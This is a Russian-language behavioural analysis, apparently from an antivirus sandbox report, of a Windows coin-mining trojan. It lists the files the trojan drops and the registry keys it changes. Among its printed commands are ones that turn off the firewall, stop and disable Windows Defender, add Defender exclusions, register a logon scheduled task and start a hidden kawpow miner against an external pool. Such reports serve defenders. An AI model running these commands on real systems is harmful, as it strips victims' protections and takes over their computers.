Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- <SYSTEM32>\tasks\windows protection
Устанавливает следующие настройки сервисов
- [HKLM\System\CurrentControlSet\Services\IKEEXT] 'Start' = '00000002'
Вредоносные функции
Для обхода брандмауэра удаляет или модифицирует следующие ключи реестра
- [HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile] 'EnableFirewall' = '00000000'
- [HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] 'EnableFirewall' = '00000000'
Для затруднения выявления своего присутствия в системе
блокирует запуск следующих системных утилит:
- Системный антивирус (Защитник Windows)
добавляет исключения антивируса с помощью следующих ключей реестра:
- [HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%ALLUSERSPROFILE%\Defender' = '00000000'
- [HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%ALLUSERSPROFILE%\Task Host' = '00000000'
Запускает на исполнение
- '%WINDIR%\syswow64\netsh.exe' Advfirewall set allprofiles state off
- '%WINDIR%\syswow64\net.exe' stop windefend
- '<SYSTEM32>\taskkill.exe' /F /FI "imagename eq Windows Protection.exe"
- '<SYSTEM32>\taskkill.exe' /F /FI "imagename eq Windows Process.exe"
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\autad2f.tmp
- %TEMP%\aut5cee.tmp
- %ALLUSERSPROFILE%\task host\svchost.exe
- %TEMP%\aut5e46.tmp
- %ALLUSERSPROFILE%\defender\windows protection.exe
- %TEMP%\aut63b4.tmp
- %ALLUSERSPROFILE%\defender\winring0x64.sys
- %TEMP%\aut63f3.tmp
- %ALLUSERSPROFILE%\defender\start.exe
- %TEMP%\aut6432.tmp
- %ALLUSERSPROFILE%\defender\start.vbs
- %TEMP%\aut6453.tmp
- %ALLUSERSPROFILE%\defender\k.bat
- %TEMP%\aut6473.tmp
- %ALLUSERSPROFILE%\ntuser.pol
- %HOMEPATH%\ntuser.pol
- %ALLUSERSPROFILE%\defender\k.vbs
- %TEMP%\aut6493.tmp
- %TEMP%\cscc5be.tmp
- %TEMP%\1c47ep_e.out
- %TEMP%\1c47ep_e.cmdline
- %TEMP%\1c47ep_e.0.cs
- %TEMP%\82c6.tmp\82c7.tmp\82c8.bat
- %ALLUSERSPROFILE%\defender\usrfindhandle32.sys
- %ALLUSERSPROFILE%\defender\windows process.exe
- %ALLUSERSPROFILE%\defender\timeout.ps1
- %TEMP%\aut64c5.tmp
- %ALLUSERSPROFILE%\defender\s.bat
- %TEMP%\aut64b4.tmp
- %ALLUSERSPROFILE%\defender\s.vbs
- %TEMP%\aut64b3.tmp
- %ALLUSERSPROFILE%\defender\p.vbs
- <SYSTEM32>\grouppolicy\user\registry.pol
- <SYSTEM32>\grouppolicy\gpt.ini
- <SYSTEM32>\grouppolicy\machine\registry.pol
- %TEMP%\autad4f.tmp
- %ALLUSERSPROFILE%\defender\ab.exe
- %TEMP%\autafa1.tmp
- %ALLUSERSPROFILE%\defender\wave64bit.exe
- %ALLUSERSPROFILE%\defender\dc.ini
- %ALLUSERSPROFILE%\defender\dd.bat
- %ALLUSERSPROFILE%\defender\ddd.bat
- %ALLUSERSPROFILE%\defender\dc.exe
- %ALLUSERSPROFILE%\defender\dd.vbs
- %TEMP%\autdb82.tmp
- %ALLUSERSPROFILE%\defender\ac1.exe
- %ALLUSERSPROFILE%\defender\a.exe
- %ALLUSERSPROFILE%\defender\crdllunload32.dll
- %ALLUSERSPROFILE%\defender\crdllunload64.dll
- %ALLUSERSPROFILE%\defender\config.json
- %ALLUSERSPROFILE%\defender\d.exe
- %WINDIR%\syswow64\grouppolicy\gpt.ini
- %ALLUSERSPROFILE%\defender\d.vbs
- %ALLUSERSPROFILE%\defender\d1.exe
- %ALLUSERSPROFILE%\defender\l.exe
- %ALLUSERSPROFILE%\defender\l.ini
- %ALLUSERSPROFILE%\defender\t.bat
- %ALLUSERSPROFILE%\defender\t.vbs
- %TEMP%\aut6514.tmp
- %ALLUSERSPROFILE%\defender\u.exe
- %TEMP%\resc5cf.tmp
- %ALLUSERSPROFILE%\defender\v.bat
- %ALLUSERSPROFILE%\defender\w.bat
- %TEMP%\autf25d.tmp
- %ALLUSERSPROFILE%\defender\ac.exe
- %ALLUSERSPROFILE%\defender\c1.exe
- %ALLUSERSPROFILE%\defender\usrfindhandle64.sys
- %TEMP%\1c47ep_e.dll
Присваивает атрибут 'скрытый' для следующих файлов
- %HOMEPATH%\tempntuser.pol
- %ALLUSERSPROFILE%\tempntuser.pol
Удаляет следующие файлы
- %TEMP%\autad2f.tmp
- %TEMP%\1c47ep_e.cmdline
- %TEMP%\1c47ep_e.out
- %TEMP%\1c47ep_e.dll
- %TEMP%\cscc5be.tmp
- %TEMP%\resc5cf.tmp
- %TEMP%\82c6.tmp\82c7.tmp\82c8.bat
- %ALLUSERSPROFILE%\tempntuser.pol
- %HOMEPATH%\tempntuser.pol
- %TEMP%\aut6514.tmp
- %TEMP%\aut64c5.tmp
- %TEMP%\aut64b4.tmp
- %TEMP%\1c47ep_e.0.cs
- %TEMP%\aut64b3.tmp
- %TEMP%\aut6473.tmp
- %TEMP%\aut6453.tmp
- %TEMP%\aut6432.tmp
- %TEMP%\aut63f3.tmp
- %TEMP%\aut63b4.tmp
- %TEMP%\aut5e46.tmp
- %TEMP%\aut5cee.tmp
- %TEMP%\autf25d.tmp
- %TEMP%\autdb82.tmp
- %TEMP%\autafa1.tmp
- %TEMP%\autad4f.tmp
- %TEMP%\aut6493.tmp
- %TEMP%\1c47ep_e.pdb
Перемещает следующие файлы
- %HOMEPATH%\ntuser.pol в %HOMEPATH%\tempntuser.pol
- %ALLUSERSPROFILE%\ntuser.pol в %ALLUSERSPROFILE%\tempntuser.pol
Подменяет следующие файлы
- %HOMEPATH%\ntuser.pol
- %ALLUSERSPROFILE%\ntuser.pol
Сетевая активность
Подключается к
- '17#.#11.238.165':5500
UDP
- 'localhost':49430
- 'localhost':58722
Другое
Ищет следующие окна
- ClassName: 'EDIT' WindowName: ''
- ClassName: '' WindowName: ''
Создает и запускает на исполнение
- '%ALLUSERSPROFILE%\defender\ab.exe' -pMym5DNNMnqsLhbcZaef2Zau9zuxyKFRzEav3QTVA
- '<SYSTEM32>\wscript.exe' "%ALLUSERSPROFILE%\Defender\p.vbs"
- '<SYSTEM32>\wscript.exe' "%ALLUSERSPROFILE%\Defender\k.vbs"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -executionpolicy Unrestricted %ALLUSERSPROFILE%\Defender\timeout.ps1
- '%ALLUSERSPROFILE%\task host\svchost.exe'
- '<SYSTEM32>\wscript.exe' "%ALLUSERSPROFILE%\Defender\s.vbs"
- '%ALLUSERSPROFILE%\defender\start.exe'
- '%ALLUSERSPROFILE%\defender\windows protection.exe'
- '%ALLUSERSPROFILE%\defender\c1.exe'
- '%ALLUSERSPROFILE%\defender\d.exe' 70 %ALLUSERSPROFILE%\Defender\d1.exe
- '%WINDIR%\syswow64\wscript.exe' "%ALLUSERSPROFILE%\Defender\d.vbs"
- '%ALLUSERSPROFILE%\defender\u.exe'
- '%ALLUSERSPROFILE%\defender\ac1.exe' -pMym5DNNMnqsLhbcZaef2Zau9zuxyKFRzEav3QTVA
- '%WINDIR%\syswow64\wscript.exe' "%ALLUSERSPROFILE%\Defender\dd.vbs"
- '%ALLUSERSPROFILE%\defender\wave64bit.exe'
- '%ALLUSERSPROFILE%\defender\ac.exe' -pMym5DNNMnqsLhbcZaef2Zau9zuxyKFRzEav3QTVA
- '%ALLUSERSPROFILE%\defender\windows process.exe' --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 30 -u RRL8ppAwBsw28SR8cTZjmdyRnwaT8BC2L7.k
Запускает на исполнение
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v ServiceKeepAlive /t REG_DWORD /d 0 /f
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "%ALLUSERSPROFILE%\Task Host" /t REG_DWORD /d 0 /f
- '<SYSTEM32>\cmd.exe' /c ""%ALLUSERSPROFILE%\Defender\s.bat" " (со скрытым окном)
- '<SYSTEM32>\raserver.exe' /offerraupdate
- '%WINDIR%\syswow64\schtasks.exe' /CREATE /SC ONLOGON /TN "Windows Protection" /TR "%ALLUSERSPROFILE%\Defender\Start.exe" /f
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRoutinelyTakingAction /t REG_DWORD /d 1 /f
- '<SYSTEM32>\cmd.exe' /c ""%ALLUSERSPROFILE%\Defender\k.bat" " (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESC5CF.tmp" "%TEMP%\CSCC5BE.tmp" (со скрытым окном)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
- '%WINDIR%\syswow64\net1.exe' stop windefend
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\82C6.tmp\82C7.tmp\82C8.bat %ALLUSERSPROFILE%\Defender\Start.exe" (со скрытым окном)
- '<SYSTEM32>\gpscript.exe' /RefreshSystemParam
- '<SYSTEM32>\svchost.exe' -k secsvcs
- '%WINDIR%\syswow64\cmd.exe' /c ""%ALLUSERSPROFILE%\Defender\t.bat" " (со скрытым окном)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "%ALLUSERSPROFILE%\Defender" /t REG_DWORD /d 0 /f
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\1c47ep_e.cmdline" (со скрытым окном)
- '<SYSTEM32>\timeout.exe' /t 10
- '%ALLUSERSPROFILE%\defender\windows protection.exe' (со скрытым окном)
- '%ALLUSERSPROFILE%\task host\svchost.exe' (со скрытым окном)
- '%ALLUSERSPROFILE%\defender\d.exe' 70 %ALLUSERSPROFILE%\Defender\d1.exe (со скрытым окном)
- '%ALLUSERSPROFILE%\defender\windows process.exe' --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 30 -u RRL8ppAwBsw28SR8cTZjmdyRnwaT8BC2L7.k (со скрытым окном)
